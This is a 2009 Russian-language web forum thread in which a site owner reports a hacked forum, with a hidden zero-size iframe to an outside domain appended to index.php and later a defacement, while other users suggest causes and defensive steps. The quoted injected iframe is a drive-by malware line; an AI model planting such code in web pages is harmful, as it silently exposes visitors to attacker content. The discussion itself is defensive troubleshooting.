1 (29.03.2009 12:25 отредактировано dilavis)

Тема: Злоумышленники испортили форум - iframe в index.php

Каким-то образом мне на форум в файл index.php добисали в конец файла:

<iframe src="http://tosto-vik.ru/index.php?sall=Bad" width="0" height="0" style="display:none;"></iframe>

Это привело к тому, что форум перестал вообще работать и выдавал ошибку php о синтаксисе.

Подскажите, как это могла произойти?
Как мне не допустить подобного в будущем?

Поделиться

2

Re: Злоумышленники испортили форум - iframe в index.php

Хранить пароли не в тотал-командере и поставить антивирус.

Сайт hcs

Поделиться

3 (29.03.2009 09:09 отредактировано dilavis)

Re: Злоумышленники испортили форум - iframe в index.php

hcs, спасибо за совет.
Но у меня лунукс, плюс к тому доступ к FileZilla дополнительно закрыт.

Поделиться

4

Re: Злоумышленники испортили форум - iframe в index.php

Может хостер "лукавит"?
Права доступа кстати какие на файл стоят. Я однажды закинул файлы с разрешением на запись для всех )))
Кстати, я больше люблю gftp, но сейчас тоже FileZilla.

У каждого свой взгляд на мир.

Сайт coordinator

Поделиться

5 (29.03.2009 12:24 отредактировано dilavis)

Re: Злоумышленники испортили форум - iframe в index.php

Возможно, незнаю, недавно с ним дело имею. Если вероятность того, что это в нем причина велика, могу уйти. sad
Права на файл 644.

Поделиться

6

Re: Злоумышленники испортили форум - iframe в index.php

fosfo.ru/2009/03/uyazvimost/

Сайт hcs

Поделиться

7 (30.03.2009 03:20 отредактировано dilavis)

Re: Злоумышленники испортили форум - iframe в index.php

hcs, спасибо. Пароли уже сменил. Но никак не могу понять как так получилось. sad

Зайдя в хостинг-аккаунд обнаружил что отсутствуют Логи использования Apache и Логи ошибок Apache.
Это может что-то значить для меня (не разбираюсь в этом)?

Вот еще нашел информацию:
avnar.ru/all/attention-viruses-2/#comments
(У меня не бест-хостер.)

Поделиться

8

Re: Злоумышленники испортили форум - iframe в index.php

Ну видимо поимели хостера твоего, может трафик прослушали да собрали пароли к аккаунтам, не везде он шифруется.

Добавлено спустя 1 минуту 35 секунд:

ты пароли сменил, теперь только держи руку на пульсе, сделай бэкапы, и не переживай особо.
Сообщи о случившемся хостеру, пусть тоже в затылке почешутся.

Сайт hcs

Поделиться

9

Re: Злоумышленники испортили форум - iframe в index.php

Спасибо. Бэкапы сделаны. wink

Поделиться

10 (31.03.2009 03:12 отредактировано dilavis)

Re: Злоумышленники испортили форум - iframe в index.php

Вот и логичное развитие событий. На сайте теперь это, хотя все важные пароли были заменены:

0wn3d by -=M.o.B=-
if you want to know how, email me your details & send 20WMZ to: Z385450145510
Thank you.

Самое плохое, что я не знаю откуда "растут ноги". sad

Искал по поисковику... хостинг вроде у всех разный:
yandex.ru/yandsearch?clid=9582&a … 5450145510

Поделиться

11

Re: Злоумышленники испортили форум - iframe в index.php

С хостером связывался?

Сайт hcs

Поделиться

12

Re: Злоумышленники испортили форум - iframe в index.php

Да. Недавно ответили:

"Добрый день.

Злоумышленниками проводится массовая атака на сервер.
Работа будет восстановлена в ближайшее время, приносим извинения за предоставленные неудобства.

Если после восстановления работы проблема у вас останется, пожалуйста уведомите нас."

Значит ли это что с моим скриптом и паролями все в порядке и проблем при переезде на другой хостинг все будет в порядке?

Поделиться

13

Re: Злоумышленники испортили форум - iframe в index.php

Видимо да, проблема в хостере.

Сайт hcs

Поделиться

14

Re: Злоумышленники испортили форум - iframe в index.php

а что за хостер? совдеповский?

Поделиться

15

Re: Злоумышленники испортили форум - iframe в index.php

Хостер lite-host.in

Добавлено спустя 34 минуты 22 секунды:

Захожу в свой аккаунд в DirectAdmin, переходу по ссылке "Интерфейс phpMyAdmin", а там кое же:

"0wn3d by -=M.o.B=-
if you want to know how, email me your details & send 20WMZ to: Z385450145510
Thank you."

Хотя в разделе "Управление MySQL" база есть.
По ftp зайти тоже не могу.

Поделиться

16

Re: Злоумышленники испортили форум - iframe в index.php

'Это какие-то реселлеры. Нормальный хостер давно бы закрыл дырку. Что тебя там держит?

Добавлено спустя 2 минуты 28 секунд:

Компания LITE-HOST.IN была образована 1 декабря 2007 года.
Мы стремимся постоянно повышать качество предоставляемых сервисов и расширяя список предлагаемых услуг.
Если Вы ищете надежную хостинг компанию – обратитесь в LITE-HOST.IN Мы будем рады заняться обслуживанием Вашего проекта.

Очень лаконичное "О нас", ни адреса, ничего, звонить на деревню дедушке, сапорт по мылу в рабочее время. Ну это твой выбор, что сказать еще.

Сайт hcs

Поделиться

17

Re: Злоумышленники испортили форум - iframe в index.php

hcs, понятно, спасибо. Я вот еще к best-hoster.ru приглядываюсь, может быть знаете о нем что-нибудь? У меня 3 небольших сайта, поэтому рассматриваю очень недорогие тарифы (3 сайта, 3 базы, неогр. траф.).

Поделиться

18

Re: Злоумышленники испортили форум - iframe в index.php

Jino попробуй, там расчеты по калькулятору, так что можешь за месяц заплатить, не понравится уйти.

У каждого свой взгляд на мир.

Сайт coordinator

Поделиться

19

Re: Злоумышленники испортили форум - iframe в index.php

coordinator, спасибо. У меня на этом калькуляторе вышло минимум 117.00 руб./мес. - дорого.

Поделиться

20

Re: Злоумышленники испортили форум - iframe в index.php

Полгода назад испытывал подобные приключения со своим сайтом. Спасал только бэкап, пока разбирался с проблемой. За неделю 4 раза ломали. Посидел в форумах и как итог
- никаких ftp-клиентов (сайт у меня маленький, торопиться мне некуда, а одной уязвимостью меньше)
- смена ВСЕХ паролей
- обязательная защита файлом .htaccess (просто в освоении и достаточно эффективно - в админку вход со строго ограниченного числа ip-адресов, в идеале вообще один. А после просмотра логов ip, с которого проводилась атака вообще в запрете, от греха подальше)
- после любых изменений бэкап обязателен, сохраняю 3-5 последних и еще парочку после массовых изменений
Но если Direct Admin "хлопнули" - ты ничем не застрахуешься у этого хостера. Как ломали так и будут ломать. Пора менять хостера...

Поделиться

21

Re: Злоумышленники испортили форум - iframe в index.php

podarok66, спасибо! Застрахуюсь как смогу. Данные дороже... smile

Поделиться

22

Re: Злоумышленники испортили форум - iframe в index.php

у меня такое было, на всех сайтах при краже паролей с ftp-клиента - хотя с linux странно... neutral

Сайт Andrey_1cov

Поделиться

23

Re: Злоумышленники испортили форум - iframe в index.php

Andrey_1cov, сейчас уже выяснилось что я ни причем. Ломали целиком хостера. (

p.s. все бльше и больше нравится ubuntu... wink

Поделиться

24

Re: Злоумышленники испортили форум - iframe в index.php

Вот хрень, сегодня всё утро проковырялся, у меня то же самое sad Фрейм ведет на другой адрес, но принцип тот же. Обнаруживает только avast, HTML:Iframe-inf.

PunBB.Ru ☭

Сайт nobody

Поделиться

25 (26.04.2009 08:21 отредактировано dilavis)

Re: Злоумышленники испортили форум - iframe в index.php

Самое плохое, что скорее всего, это не ваша вина. sad

Поделиться